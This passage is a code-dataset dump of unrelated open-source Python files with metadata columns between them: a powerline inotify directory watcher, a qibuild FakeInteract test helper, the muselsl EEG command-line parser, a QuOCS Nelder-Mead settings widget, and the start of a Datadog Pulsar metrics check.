pass
return True
try:
return w()
except BaseDirChanged:
self.watches.pop(path, None)
return True
except DirTooLarge as e:
if logger is not None:
logger.warn(str(e))
self.watches[path] = DummyTreeWatcher(path)
return False
if __name__ == '__main__':
w = INotifyTreeWatcher(sys.argv[-1])
w()
print ('Monitoring', sys.argv[-1], 'press Ctrl-C to stop')
try:
while True:
if w():
print (sys.argv[-1], 'changed')
sleep(1)
except KeyboardInterrupt:
raise SystemExit(0)
| <filename>powerline/lib/tree_watcher.py
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, absolute_import, print_function)
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import sys
import os
import errno
from time import sleep
from powerline.lib.monotonic import monotonic
from powerline.lib.inotify import INotify, INotifyError
class NoSuchDir(ValueError):
pass
class BaseDirChanged(ValueError):
pass
class DirTooLarge(ValueError):
def __init__(self, bdir):
ValueError.__init__(self, 'The directory {0} is too large to monitor. Try increasing the value in /proc/sys/fs/inotify/max_user_watches'.format(bdir))
def realpath(path):
return os.path.abspath(os.path.realpath(path))
class INotifyTreeWatcher(INotify):
is_dummy = False
def __init__(self, basedir, ignore_event=None):
super(INotifyTreeWatcher, self).__init__()
self.basedir = realpath(basedir)
self.watch_tree()
self.modified = True
self.ignore_event = (lambda path, name: False) if ignore_event is None else ignore_event
def watch_tree(self):
self.watched_dirs = {}
self.watched_rmap = {}
try:
self.add_watches(self.basedir)
except OSError as e:
if e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
def add_watches(self, base, top_level=True):
''' Add watches for this directory and all its descendant directories,
recursively. '''
base = realpath(base)
# There may exist a link which leads to an endless
# add_watches loop or to maximum recursion depth exceeded
if not top_level and base in self.watched_dirs:
return
try:
is_dir = self.add_watch(base)
except OSError as e:
if e.errno == errno.ENOENT:
# The entry could have been deleted between listdir() and
# add_watch().
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
if e.errno == errno.EACCES:
# We silently ignore entries for which we dont have permission,
# unless they are the top level dir
if top_level:
raise NoSuchDir('You do not have permission to monitor {0}'.format(base))
return
raise
else:
if is_dir:
try:
files = os.listdir(base)
except OSError as e:
if e.errno in (errno.ENOTDIR, errno.ENOENT):
# The dir was deleted/replaced between the add_watch()
# and listdir()
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
raise
for x in files:
self.add_watches(os.path.join(base, x), top_level=False)
elif top_level:
# The top level dir is a file, not good.
raise NoSuchDir('The dir {0} does not exist'.format(base))
def add_watch(self, path):
import ctypes
bpath = path if isinstance(path, bytes) else path.encode(self.fenc)
wd = self._add_watch(self._inotify_fd, ctypes.c_char_p(bpath),
# Ignore symlinks and watch only directories
self.DONT_FOLLOW | self.ONLYDIR |
self.MODIFY | self.CREATE | self.DELETE |
self.MOVE_SELF | self.MOVED_FROM | self.MOVED_TO |
self.ATTRIB | self.DELETE_SELF)
if wd == -1:
eno = ctypes.get_errno()
if eno == errno.ENOTDIR:
return False
raise OSError(eno, 'Failed to add watch for: {0}: {1}'.format(path, self.os.strerror(eno)))
self.watched_dirs[path] = wd
self.watched_rmap[wd] = path
return True
def process_event(self, wd, mask, cookie, name):
if wd == -1 and (mask & self.Q_OVERFLOW):
# We missed some INOTIFY events, so we dont
# know the state of any tracked dirs.
self.watch_tree()
self.modified = True
return
path = self.watched_rmap.get(wd, None)
if path is not None:
self.modified = not self.ignore_event(path, name)
if mask & self.CREATE:
# A new sub-directory might have been created, monitor it.
try:
self.add_watch(os.path.join(path, name))
except OSError as e:
if e.errno == errno.ENOENT:
# Deleted before add_watch()
pass
elif e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
else:
raise
if (mask & self.DELETE_SELF or mask & self.MOVE_SELF) and path == self.basedir:
raise BaseDirChanged('The directory %s was moved/deleted' % path)
def __call__(self):
self.read()
ret = self.modified
self.modified = False
return ret
class DummyTreeWatcher(object):
is_dummy = True
def __init__(self, basedir):
self.basedir = realpath(basedir)
def __call__(self):
return False
class TreeWatcher(object):
def __init__(self, expire_time=10):
self.watches = {}
self.last_query_times = {}
self.expire_time = expire_time * 60
def watch(self, path, logger=None, ignore_event=None):
path = realpath(path)
try:
w = INotifyTreeWatcher(path, ignore_event=ignore_event)
except (INotifyError, DirTooLarge) as e:
if logger is not None and not isinstance(e, INotifyError):
logger.warn('Failed to watch path: {0} with error: {1}'.format(path, e))
w = DummyTreeWatcher(path)
self.watches[path] = w
return w
def is_actually_watched(self, path):
w = self.watches.get(path, None)
return not getattr(w, 'is_dummy', True)
def expire_old_queries(self):
pop = []
now = monotonic()
for path, lt in self.last_query_times.items():
if now - lt > self.expire_time:
pop.append(path)
for path in pop:
del self.last_query_times[path]
def __call__(self, path, logger=None, ignore_event=None):
path = realpath(path)
self.expire_old_queries()
self.last_query_times[path] = monotonic()
w = self.watches.get(path, None)
if w is None:
try:
self.watch(path, logger=logger, ignore_event=ignore_event)
except NoSuchDir:
pass
return True
try:
return w()
except BaseDirChanged:
self.watches.pop(path, None)
return True
except DirTooLarge as e:
if logger is not None:
logger.warn(str(e))
self.watches[path] = DummyTreeWatcher(path)
return False
if __name__ == '__main__':
w = INotifyTreeWatcher(sys.argv[-1])
w()
print ('Monitoring', sys.argv[-1], 'press Ctrl-C to stop')
try:
while True:
if w():
print (sys.argv[-1], 'changed')
sleep(1)
except KeyboardInterrupt:
raise SystemExit(0)
| en | 0.929685 | # vim:fileencoding=utf-8:noet Add watches for this directory and all its descendant directories, recursively. # There may exist a link which leads to an endless # add_watches loop or to maximum recursion depth exceeded # The entry could have been deleted between listdir() and # add_watch(). # We silently ignore entries for which we dont have permission, # unless they are the top level dir # The dir was deleted/replaced between the add_watch() # and listdir() # The top level dir is a file, not good. # Ignore symlinks and watch only directories # We missed some INOTIFY events, so we dont # know the state of any tracked dirs. # A new sub-directory might have been created, monitor it. # Deleted before add_watch() | 2.192193 | 2 |
python/qisys/test/fake_interact.py | PrashantKumar-sudo/qibuild | 0 | 9119 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Fake Interact """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
class FakeInteract(object):
""" A class to tests code depending on qisys.interact """
def __init__(self):
""" FakeInteract Init """
self.answers_type = None
self.answer_index = -1
self._answers = None
self.questions = list()
self.editor = None
@property
def answers(self):
""" Answers Getter """
if self._answers is None:
raise Exception("FakeInteract not initialized")
return self._answers
@answers.setter
def answers(self, value):
""" Answers Setter """
if isinstance(value, dict):
self.answers_type = "dict"
elif isinstance(value, list):
self.answers_type = "list"
else:
raise Exception("Unknow answer type: " + type(value))
self._answers = value
def find_answer(self, message, choices=None, default=None):
""" Find Answer """
keys = self.answers.keys()
for key in keys:
if key in message.lower():
if not choices:
return self.answers[key]
answer = self.answers[key]
if answer in choices:
return answer
else:
mess = "Would answer %s\n" % answer
mess += "But choices are: %s\n" % choices
raise Exception(mess)
if default is not None:
return default
mess = "Could not find answer for\n :: %s\n" % message
mess += "Known keys are: %s" % ", ".join(keys)
raise Exception(mess)
def ask_choice(self, choices, message, **_unused):
""" Ask Choice """
print("::", message)
for choice in choices:
print("* ", choice)
answer = self._get_answer(message, choices)
print(">", answer)
return answer
def ask_yes_no(self, message, default=False):
""" Ask Yes / No """
print("::", message,)
if default:
print("(Y/n)")
else:
print("(y/N)")
answer = self._get_answer(message, default=default)
print(">", answer)
return answer
def ask_path(self, message):
""" Ask Path """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_string(self, message):
""" Ask String """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_program(self, message):
""" Ask Program """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def get_editor(self):
""" Return the Editor """
return self.editor
def _get_answer(self, message, choices=None, default=None):
""" Get an Answer """
question = dict()
question['message'] = message
question['choices'] = choices
question['default'] = default
self.questions.append(question)
if self.answers_type == "dict":
return self.find_answer(message, choices=choices, default=default)
self.answer_index += 1
return self.answers[self.answer_index]
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Fake Interact """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
class FakeInteract(object):
""" A class to tests code depending on qisys.interact """
def __init__(self):
""" FakeInteract Init """
self.answers_type = None
self.answer_index = -1
self._answers = None
self.questions = list()
self.editor = None
@property
def answers(self):
""" Answers Getter """
if self._answers is None:
raise Exception("FakeInteract not initialized")
return self._answers
@answers.setter
def answers(self, value):
""" Answers Setter """
if isinstance(value, dict):
self.answers_type = "dict"
elif isinstance(value, list):
self.answers_type = "list"
else:
raise Exception("Unknow answer type: " + type(value))
self._answers = value
def find_answer(self, message, choices=None, default=None):
""" Find Answer """
keys = self.answers.keys()
for key in keys:
if key in message.lower():
if not choices:
return self.answers[key]
answer = self.answers[key]
if answer in choices:
return answer
else:
mess = "Would answer %s\n" % answer
mess += "But choices are: %s\n" % choices
raise Exception(mess)
if default is not None:
return default
mess = "Could not find answer for\n :: %s\n" % message
mess += "Known keys are: %s" % ", ".join(keys)
raise Exception(mess)
def ask_choice(self, choices, message, **_unused):
""" Ask Choice """
print("::", message)
for choice in choices:
print("* ", choice)
answer = self._get_answer(message, choices)
print(">", answer)
return answer
def ask_yes_no(self, message, default=False):
""" Ask Yes / No """
print("::", message,)
if default:
print("(Y/n)")
else:
print("(y/N)")
answer = self._get_answer(message, default=default)
print(">", answer)
return answer
def ask_path(self, message):
""" Ask Path """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_string(self, message):
""" Ask String """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_program(self, message):
""" Ask Program """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def get_editor(self):
""" Return the Editor """
return self.editor
def _get_answer(self, message, choices=None, default=None):
""" Get an Answer """
question = dict()
question['message'] = message
question['choices'] = choices
question['default'] = default
self.questions.append(question)
if self.answers_type == "dict":
return self.find_answer(message, choices=choices, default=default)
self.answer_index += 1
return self.answers[self.answer_index]
| en | 0.684124 | #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved. # Use of this source code is governed by a BSD-style license (see the COPYING file). Fake Interact A class to tests code depending on qisys.interact FakeInteract Init Answers Getter Answers Setter Find Answer Ask Choice Ask Yes / No Ask Path Ask String Ask Program Return the Editor Get an Answer | 2.750968 | 3 |
muselsl/cli.py | kowalej/muse-lsl | 2 | 9120 | #!/usr/bin/python
import sys
import argparse
class main:
def __init__(self):
parser = argparse.ArgumentParser(
description='Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.',
usage='''muselsl <command> [<args>]
Available commands:
list List available Muse devices.
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
stream Start an LSL stream from Muse headset.
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
view Visualize EEG data from an LSL stream.
-w --window Window length to display in seconds.
-s --scale Scale in uV.
-r --refresh Refresh rate in seconds.
-f --figure Window size.
-v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).
record Record EEG data from an LSL stream.
-d --duration Duration of the recording in seconds.
-f --filename Name of the recording file.
-dj --dejitter Whether to apply dejitter correction to timestamps.
record_direct Record data directly from Muse headset (no LSL).
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
''')
parser.add_argument('command', help='Command to run.')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Incorrect usage. See help below.')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def list(self):
parser = argparse.ArgumentParser(
description='List available Muse devices.')
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import list_muses
list_muses(args.backend, args.interface)
def stream(self):
parser = argparse.ArgumentParser(
description='Start an LSL stream from Muse headset.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import stream
stream(args.address, args.backend,
args.interface, args.name)
def record(self):
parser = argparse.ArgumentParser(
description='Record data from an LSL stream.')
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
parser.add_argument("-dj", "--dejitter",
dest="dejitter", type=bool, default=True,
help="Whether to apply dejitter correction to timestamps.")
args = parser.parse_args(sys.argv[2:])
from . import record
record(args.duration, args.filename, args.dejitter)
def record_direct(self):
parser = argparse.ArgumentParser(
description='Record directly from Muse without LSL.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
args = parser.parse_args(sys.argv[2:])
from . import record_direct
record_direct(args.address, args.backend,
args.interface, args.name, args.duration, args.filename)
def view(self):
parser = argparse.ArgumentParser(
description='View EEG data from an LSL stream.')
parser.add_argument("-w", "--window",
dest="window", type=float, default=5.,
help="Window length to display in seconds.")
parser.add_argument("-s", "--scale",
dest="scale", type=float, default=100,
help="Scale in uV.")
parser.add_argument("-r", "--refresh",
dest="refresh", type=float, default=0.2,
help="Refresh rate in seconds.")
parser.add_argument("-f", "--figure",
dest="figure", type=str, default="15x6",
help="Window size.")
parser.add_argument("-v", "--version",
dest="version", type=int, default=1,
help="Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).")
args = parser.parse_args(sys.argv[2:])
from . import view
view(args.window, args.scale, args.refresh, args.figure, args.version)
| #!/usr/bin/python
import sys
import argparse
class main:
def __init__(self):
parser = argparse.ArgumentParser(
description='Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.',
usage='''muselsl <command> [<args>]
Available commands:
list List available Muse devices.
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
stream Start an LSL stream from Muse headset.
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
view Visualize EEG data from an LSL stream.
-w --window Window length to display in seconds.
-s --scale Scale in uV.
-r --refresh Refresh rate in seconds.
-f --figure Window size.
-v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).
record Record EEG data from an LSL stream.
-d --duration Duration of the recording in seconds.
-f --filename Name of the recording file.
-dj --dejitter Whether to apply dejitter correction to timestamps.
record_direct Record data directly from Muse headset (no LSL).
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
''')
parser.add_argument('command', help='Command to run.')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Incorrect usage. See help below.')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def list(self):
parser = argparse.ArgumentParser(
description='List available Muse devices.')
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import list_muses
list_muses(args.backend, args.interface)
def stream(self):
parser = argparse.ArgumentParser(
description='Start an LSL stream from Muse headset.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import stream
stream(args.address, args.backend,
args.interface, args.name)
def record(self):
parser = argparse.ArgumentParser(
description='Record data from an LSL stream.')
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
parser.add_argument("-dj", "--dejitter",
dest="dejitter", type=bool, default=True,
help="Whether to apply dejitter correction to timestamps.")
args = parser.parse_args(sys.argv[2:])
from . import record
record(args.duration, args.filename, args.dejitter)
def record_direct(self):
parser = argparse.ArgumentParser(
description='Record directly from Muse without LSL.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
args = parser.parse_args(sys.argv[2:])
from . import record_direct
record_direct(args.address, args.backend,
args.interface, args.name, args.duration, args.filename)
def view(self):
parser = argparse.ArgumentParser(
description='View EEG data from an LSL stream.')
parser.add_argument("-w", "--window",
dest="window", type=float, default=5.,
help="Window length to display in seconds.")
parser.add_argument("-s", "--scale",
dest="scale", type=float, default=100,
help="Scale in uV.")
parser.add_argument("-r", "--refresh",
dest="refresh", type=float, default=0.2,
help="Refresh rate in seconds.")
parser.add_argument("-f", "--figure",
dest="figure", type=str, default="15x6",
help="Window size.")
parser.add_argument("-v", "--version",
dest="version", type=int, default=1,
help="Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).")
args = parser.parse_args(sys.argv[2:])
from . import view
view(args.window, args.scale, args.refresh, args.figure, args.version)
| en | 0.544914 | #!/usr/bin/python muselsl <command> [<args>] Available commands: list List available Muse devices. -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi. -i --interface The interface to use, 'hci0' for gatt or a com port for bgapi. stream Start an LSL stream from Muse headset. -a --address Device MAC address. -n --name Device name (e.g. Muse-41D2). -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi. -i --interface The interface to use, 'hci0' for gatt or a com port for bgapi. view Visualize EEG data from an LSL stream. -w --window Window length to display in seconds. -s --scale Scale in uV. -r --refresh Refresh rate in seconds. -f --figure Window size. -v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments). record Record EEG data from an LSL stream. -d --duration Duration of the recording in seconds. -f --filename Name of the recording file. -dj --dejitter Whether to apply dejitter correction to timestamps. record_direct Record data directly from Muse headset (no LSL). -a --address Device MAC address. -n --name Device name (e.g. Muse-41D2). -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi. -i --interface The interface to use, 'hci0' for gatt or a com port for bgapi. # parse_args defaults to [1:] for args, but you need to # exclude the rest of the args too, or validation will fail # use dispatch pattern to invoke method with same name | 2.718368 | 3 |
src/quocspyside2interface/gui/freegradients/GeneralSettingsNM.py | Quantum-OCS/QuOCS-pyside2interface | 1 | 9121 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.gui.uiclasses.GeneralSettingsNMUI import Ui_Form
from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary
class GeneralSettingsNM(QtWidgets.QWidget, Ui_Form):
def __init__(self, loaded_dictionary=None):
super().__init__()
self.setupUi(self)
nm_dictionary, stopping_criteria_dictionary = None, None
if loaded_dictionary is not None:
nm_dictionary = loaded_dictionary["general_settings"]
stopping_criteria_dictionary = loaded_dictionary["stopping_criteria"]
# Nelder Mead Dictionary
self.nelder_mead_dictionary = NelderMeadDictionary(loaded_dictionary=nm_dictionary)
# Create widget
self.stopping_criteria_form = StoppingCriteriaNM(loaded_dictionary=stopping_criteria_dictionary)
# Connection
self.is_adaptive_checkbox.stateChanged.connect(self.set_is_adaptive)
self._initialization()
def _initialization(self):
self.is_adaptive_checkbox.setChecked(self.nelder_mead_dictionary.is_adaptive)
self.stopping_criteria_scroll_area.setWidget(self.stopping_criteria_form)
def set_is_adaptive(self):
self.nelder_mead_dictionary.is_adaptive = self.is_adaptive_checkbox.isChecked()
def get_dictionary(self):
return {"dsm_settings": {"general_settings": self.nelder_mead_dictionary.get_dictionary(),
"stopping_criteria": self.stopping_criteria_form.get_dictionary()}} | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.gui.uiclasses.GeneralSettingsNMUI import Ui_Form
from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary
class GeneralSettingsNM(QtWidgets.QWidget, Ui_Form):
def __init__(self, loaded_dictionary=None):
super().__init__()
self.setupUi(self)
nm_dictionary, stopping_criteria_dictionary = None, None
if loaded_dictionary is not None:
nm_dictionary = loaded_dictionary["general_settings"]
stopping_criteria_dictionary = loaded_dictionary["stopping_criteria"]
# Nelder Mead Dictionary
self.nelder_mead_dictionary = NelderMeadDictionary(loaded_dictionary=nm_dictionary)
# Create widget
self.stopping_criteria_form = StoppingCriteriaNM(loaded_dictionary=stopping_criteria_dictionary)
# Connection
self.is_adaptive_checkbox.stateChanged.connect(self.set_is_adaptive)
self._initialization()
def _initialization(self):
self.is_adaptive_checkbox.setChecked(self.nelder_mead_dictionary.is_adaptive)
self.stopping_criteria_scroll_area.setWidget(self.stopping_criteria_form)
def set_is_adaptive(self):
self.nelder_mead_dictionary.is_adaptive = self.is_adaptive_checkbox.isChecked()
def get_dictionary(self):
return {"dsm_settings": {"general_settings": self.nelder_mead_dictionary.get_dictionary(),
"stopping_criteria": self.stopping_criteria_form.get_dictionary()}} | en | 0.806359 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Copyright 2021- QuOCS Team # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Nelder Mead Dictionary # Create widget # Connection | 1.461848 | 1 |
pulsar/datadog_checks/pulsar/check.py | divyamamgai/integrations-extras | 158 | 9122 | <filename>pulsar/datadog_checks/pulsar/check.py
from datadog_checks.base import ConfigurationError, OpenMetricsBaseCheck
EVENT_TYPE = SOURCE_TYPE_NAME = 'pulsar'
class PulsarCheck(OpenMetricsBaseCheck):
"""
PulsarCheck derives from AgentCheck that provides the required check method
"""
def __init__(self, name, init_config, instances=None):
instance = instances[0]
url = instance.get('prometheus_url')
if url is None:
raise ConfigurationError("Unable to find prometheus_url in config file.")
self.NAMESPACE = 'kesque.pulsar'
self.metrics_mapper = {
'pulsar_consumer_available_permits': 'consumer.available_permits',
'pulsar_consumer_blocked_on_unacked_messages': 'consumer.blocked_on_unacked_messages',
'pulsar_consumer_msg_rate_out': 'consumer.msg_rate_out',
'pulsar_consumer_msg_rate_redeliver': 'consumer.msg_rate_redeliver',
'pulsar_consumer_msg_throughput_out': 'consumer.msg_throughput_out',
'pulsar_consumer_unacked_messages': 'consumer.unacked_messages',
'pulsar_consumers_count': 'consumers_count',
'pulsar_entry_size_count': 'entry_size_count',
'pulsar_entry_size_le_100_kb': 'entry_size_le_100_kb',
'pulsar_entry_size_le_128': 'entry_size_le_128',
'pulsar_entry_size_le_16_kb': 'entry_size_le_16_kb',
'pulsar_entry_size_le_1_kb': 'entry_size_le_1_kb',
'pulsar_entry_size_le_1_mb': 'entry_size_le_1_mb',
'pulsar_entry_size_le_2_kb': 'entry_size_le_2_kb',
'pulsar_entry_size_le_4_kb': 'entry_size_le_4_kb',
'pulsar_entry_size_le_512': 'entry_size_le_512',
'pulsar_entry_size_le_overflow': 'entry_size_le_overflow',
'pulsar_entry_size_sum': 'entry_size_sum',
'pulsar_in_bytes_total': 'in_bytes_total',
'pulsar_in_messages_total': 'in_messages_total',
'pulsar_msg_backlog': 'msg_backlog',
'pulsar_out_bytes_total': 'out_bytes_total',
'pulsar_out_messages_total': 'out_messages_total',
'pulsar_producers_count': 'producers_count',
'pulsar_rate_in': 'rate_in',
'pulsar_rate_out': 'rate_out',
'pulsar_replication_backlog': 'replication.backlog',
'pulsar_replication_rate_in': 'replication.rate_in',
'pulsar_replication_rate_out': 'replication.rate_out',
'pulsar_replication_throughput_in': 'replication.throughput_in',
'pulsar_replication_throughput_out': 'replication.throughput_out',
'pulsar_storage_backlog_quota_limit': 'storage.backlog_quota_limit',
'pulsar_storage_backlog_size': 'storage.backlog_size',
'pulsar_storage_read_rate': 'storage.read_rate',
'pulsar_storage_offloaded_size': 'storage.offloaded_size',
'pulsar_storage_size': 'storage.size',
'pulsar_storage_write_latency_count': 'storage.write_latency_count',
'pulsar_storage_write_latency_le_0_5': 'storage.write_latency_le_0_5',
'pulsar_storage_write_latency_le_1': 'storage.write_latency_le_1',
'pulsar_storage_write_latency_le_10': 'storage.write_latency_le_10',
'pulsar_storage_write_latency_le_100': 'storage.write_latency_le_100',
'pulsar_storage_write_latency_le_1000': 'storage.write_latency_le_1000',
'pulsar_storage_write_latency_le_20': 'storage.write_latency_le_20',
'pulsar_storage_write_latency_le_200': 'storage.write_latency_le_200',
'pulsar_storage_write_latency_le_5': 'storage.write_latency_le_5',
'pulsar_storage_write_latency_le_50': 'storage.write_latency_le_50',
'pulsar_storage_write_latency_overflow': 'storage.write_latency_overflow',
'pulsar_storage_write_latency_sum': 'storage.write_latency_sum',
'pulsar_storage_write_rate': 'storage.write_rate',
'pulsar_subscription_back_log': 'subscription.back_log',
'pulsar_subscription_back_log_no_delayed': 'subscription.back_log_no_delayed',
'pulsar_subscription_blocked_on_unacked_messages': 'subscription.blocked_on_unacked_messages',
'pulsar_subscription_delayed': 'subscription.delayed',
'pulsar_subscription_msg_rate_out': 'subscription.msg_rate_out',
'pulsar_subscription_msg_rate_redeliver': 'subscription.msg_rate_redeliver',
'pulsar_subscription_msg_throughput_out': 'subscription.msg_throughput_out',
'pulsar_subscription_unacked_messages': 'subscription.unacked_messages',
'pulsar_subscriptions_count': 'subscriptions.count',
'pulsar_throughput_in': 'throughput_in',
'pulsar_throughput_out': 'throughput_out',
'pulsar_topics_count': 'topics_count',
